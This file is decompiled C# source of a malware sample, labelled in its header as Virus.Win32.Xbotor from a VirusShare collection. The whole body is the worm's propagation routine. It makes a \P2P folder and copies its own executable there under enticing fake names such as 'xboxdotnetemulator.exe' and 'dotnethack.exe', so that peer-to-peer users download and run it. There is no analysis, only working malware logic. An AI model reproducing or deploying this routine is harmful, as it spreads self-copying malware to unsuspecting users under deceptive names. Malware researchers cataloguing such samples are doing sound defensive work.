// Decompiled with JetBrains decompiler // Type: p2pdotnet // Assembly: p2p, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 92129E77-F6EE-43FE-93E4-918DA5687A83 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.Win32.Xbotor-78aa04a37c21e84b763d1f60bf425b89a237eddcfff4977fbbee30caa45d43d5.exe using System.IO; using System.Reflection; internal class p2pdotnet { public static void Main() { Module module = Assembly.GetExecutingAssembly().GetModules()[0]; Directory.CreateDirectory("\\P2P"); string[] strArray = new string[4] { "dotnethack.exe", "xboxdotnetemulator.exe", "linuxdotnet.exe", "dosdotnet.exe" }; foreach (string str in strArray) { try { File.Copy(module.FullyQualifiedName, "\\P2P\\" + str); } catch { } } } }